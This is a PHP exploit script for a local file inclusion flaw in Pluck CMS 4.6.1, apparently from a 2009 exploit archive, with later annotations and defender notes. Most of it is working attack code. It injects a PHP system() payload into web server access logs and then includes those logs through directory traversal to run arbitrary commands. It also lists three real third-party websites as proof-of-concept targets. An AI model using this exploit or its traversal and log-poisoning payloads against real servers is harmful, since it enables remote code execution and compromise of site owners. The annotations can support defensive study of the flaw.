# Title : Pluck CMS 4.6.1 (module_pages_site.php post) LFI Exploit
# Published : 2009-03-23
# Author : Alfons Luja
<?php
/*
pluck v 4.6.1 LFI exploit
author : Alfons Luja
The vulnerability is in data/modules/blog/module_pages_site.php: the `post` query parameter is concatenated unsanitised into the path passed to include() (excerpt below).
...
$includepage = 'blog_include.php';
//Only set 'view post'-page if a post has been specified
if (isset($_GET['post'])) {
//Check if post exists, and include information
if (file_exists('data/settings/modules/blog/posts/'.$_GET['post'])) {
include('data/settings/modules/blog/posts/'.$_GET['post']);
$module_page['viewpost'] = $post_title;
}
}
...
Nothing to comment ;x
Greetings: For all friends and obvious for me ;D
pr00f:
http://www.kilgarvangaa.com//data/modules/blog/module_pages_site.php?post=../../../../../../../../../../bin/ls
http://www.southtrewlogcabins.co.uk/data/modules/blog/module_pages_site.php?post=../../../../../../../../../../bin/ls
http://www.seanhood.co.uk/data/modules/blog/module_pages_site.php?post=../../../../../../../../../../bin/ls
*/
// Command-line entry point: positional arguments are host, port, web path and the command to run.
if($argc < 4) die("Use host path command [www.penatgon.gov /pluck ls l]n");
// No execution time limit; all warnings/notices are suppressed (several later
// accesses to undefined variables and array indices rely on this).
set_time_limit(0);
error_reporting(0);
$host = $argv[1];
$port = $argv[2];
$path = $argv[3];
$command = $argv[4];
//add something if not w00rking ;x
// $shell[0] is a PHP snippet that _inject() places in a request URL so the web
// server records it in its access log; every other entry is a candidate
// access-log location, written as a relative traversal path, that _exploit()
// passes to the vulnerable `post` parameter. The sentinel strings ' e[Ho_trip '
// and ' d34th_trip' bracket the system() output so _result() can locate it.
// Defender note: a request line containing "<?php" in the access log is the
// observable artefact of this log-poisoning step.
$shell = array(
"<?php echo(' e[Ho_trip ');system('$command');echo(' d34th_trip'); ?>",
"../apache/logs/access.log",
"../../apache/logs/access.log",
"../../../apache/logs/access.log",
"../../../../apache/logs/access.log",
"../../../../../apache/logs/access.log",
"../../../../../../apache/logs/access.log",
"../../../../../../../apache/logs/access.log",
"../../../../../../../../apache/logs/access.log",
"../../../../../../../../../apache/logs/access.log",
"../../../../../../../../../../apache/logs/access.log",
"../../../../../../../../../../../apache/logs/access.log",
"../var/log/httpd/access.log",
"../../var/log/httpd/access.log",
"../../../var/log/httpd/access.log",
"../../../../var/log/httpd/access.log",
"../../../../../var/log/httpd/access.log",
"../../../../../../var/log/httpd/access.log",
"../../../../../../../var/log/httpd/access.log",
"../../../../../../../../var/log/httpd/access.log",
"../../../../../../../../../var/log/httpd/access.log",
"../../../../../../../../../../var/log/httpd/access.log",
"../../../../../../../../../../../var/log/httpd/access.log",
"../var/log/apache/access.log",
"../../var/log/apache/access.log",
"../../../var/log/apache/access.log",
"../../../../var/log/apache/access.log",
"../../../../../var/log/apache/access.log",
"../../../../../../var/log/apache/access.log",
"../../../../../../../var/log/apache/access.log",
"../../../../../../../../var/log/apache/access.log",
"../../../../../../../../../var/log/apache/access.log",
"../../../../../../../../../../var/log/apache/access.log",
"../../../../../../../../../../../var/log/apache/access.log",
"../usr/local/apache2/logs/access.log",
"../../usr/local/apache2/logs/access.log",
"../../../usr/local/apache2/logs/access.log",
"../../../../usr/local/apache2/logs/access.log",
"../../../../../usr/local/apache2/logs/access.log",
"../../../../../../usr/local/apache2/logs/access.log",
"../../../../../../../usr/local/apache2/logs/access.log",
"../../../../../../../../usr/local/apache2/logs/access.log",
"../../../../../../../../../usr/local/apache2/logs/access.log",
"../../../../../../../../../../usr/local/apache2/logs/access.log",
"../../../../../../../../../../../usr/local/apache2/logs/access.log",
);
/**
 * Build a raw HTTP/1.1 GET request whose path embeds $shell[$int]; _inject()
 * calls this with index 0 so the PHP snippet travels in the request line.
 * Reads the globals $shell, $host and $path assigned at top level.
 * Note: $header is appended to with .= without being initialised, and the
 * `rn` sequences appear here without backslashes, so as listed they are
 * literal characters rather than CRLF line terminators.
 * Returns the assembled request string.
 */
function _hdr($int){ // original comment (Polish, garbled): roughly "was not supposed to be file_get_contents"
global $shell,$host,$path;
$header .= "GET /$host/$path/$shell[$int] HTTP/1.1rn";
$header .= "Host: $hostrn";
$header .= "User-Agent: _echo [ru] (Win6.66; @)rn";
$header .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8rn";
$header .= "Accept-Language: en-us,en;q=0.5rn";
$header .= "Accept-Encoding: gzip,deflatern";
$header .= "Connection: closernrn";
return $header;
}
/**
 * Open a TCP connection to $hosts:$ports, send the request built by _hdr(0)
 * and close it. Only the first $shell entry (the PHP snippet) is sent, and the
 * response is never read. Dies if fsockopen() fails; $errno/$errstr are filled
 * by fsockopen() by reference.
 */
function _inject($hosts,$ports){
$hnd = fsockopen($hosts,$ports,$errno, $errstr, 30); // 30-second connect timeout
if(!$hnd) die("Injection errr $errstrn");
fwrite($hnd,_hdr(0));
fclose($hnd);
}
/**
 * Extract command output from a fetched page: the text between the sentinel
 * strings ' e[Ho_trip ' and ' d34th_trip' that $shell[0] echoes around its
 * system() call. Only the last sentinel-delimited segment is printed; if that
 * segment is empty the script dies. $ret[1] is read without checking that a
 * sentinel was found at all (relies on error_reporting(0) at top level).
 * Writes to stdout; returns nothing.
 */
function _result($data){
$ret = explode(' e[Ho_trip ',$data);
if($ret[1] != ""){
for($i = 1;$i<count($ret);$i++){
$ret_2 = explode(' d34th_trip',$ret[$i]);
// true only on the final iteration, i.e. for the last segment
if($i - count($ret) == -1){
if($ret_2[0] != ""){
echo($ret_2[0]);
} else {
die("Exploit failed!!n");
}
}
}
}
}
/**
 * For each candidate log path in $shell[1..], request the vulnerable page with
 * that path as the `post` query parameter (the include() sink quoted in the
 * header comment) and hand the response body to _result(). $rets is assigned
 * but never used. Returns nothing.
 * Defender note: in web logs these requests show up as `post=` values holding
 * `../` traversal sequences that point at access-log files, which is a direct
 * detection signature for this flaw.
 */
function _exploit($hosts,$paths){
global $shell;
$rets = "";
$count = count($shell);
for($i=1;$i<$count;$i++){
$tab = file_get_contents("http://".$hosts."/".$paths."/data/modules/blog/module_pages_site.php?post=$shell[$i]");
_result($tab);
}
}
// Banner, then the two phases: _inject() sends the snippet-bearing request,
// _exploit() tries each candidate log path through the vulnerable include().
echo("---- pluck v 4.6.1 -----nn".
"Autor: Alfons Lujan".
"Target: $hostn".
"Path: $pathn".
"Port: $portn".
"COM: $commandn".
"Ex: poc.php www.target.com 80 pluck "dir"nn");
_inject($host,$port);
_exploit($host,$path);
?>